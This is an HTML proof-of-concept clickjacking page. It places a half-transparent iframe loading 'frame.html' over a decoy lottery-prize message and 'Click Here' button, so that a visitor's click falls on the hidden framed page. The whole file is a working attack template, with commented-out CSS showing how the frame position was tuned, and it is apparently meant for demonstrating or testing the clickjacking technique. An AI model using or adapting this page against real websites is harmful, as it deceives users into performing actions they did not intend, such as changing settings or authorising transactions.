<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ClickJacking POC</title>
    <style>
        /* .target-website iframe{
            position: relative;
            z-index: 2;
            width: 100%;
            height: 1000%;
            margin-top: -948px;
        }

        .target-website{
            overflow: scroll;
            height: 500px;

        } */

        .target-website {
            width: 50vw;
            height: 50vh;
            overflow: hidden;
            position: absolute;
            z-index: 2;
            top: 100px;
            opacity: 0.5;
        }

        iframe {
            position: absolute;
            /* top: -837px; */
            left: -150px;
            width: 100vw;
            height: 100vh;
            /* bottom: 100px; */
        }

        .decoy-website {
            position: absolute;
            width: 50vw;
            height: 400px;
            z-index: 1;
            text-align: center;
        }

        button {
            padding: 1em 2em;
        }
    </style>
</head>

<body>
    <div class="decoy-website">
        <h1>You are on your way to win a lottery! Click here to claim your reward</h1>
        <button>Click Here</button>
    </div>
    <div class="target-website">
        <iframe src="frame.html" frameborder="0" scrolling="no"></iframe>
    </div>
</body>

</html>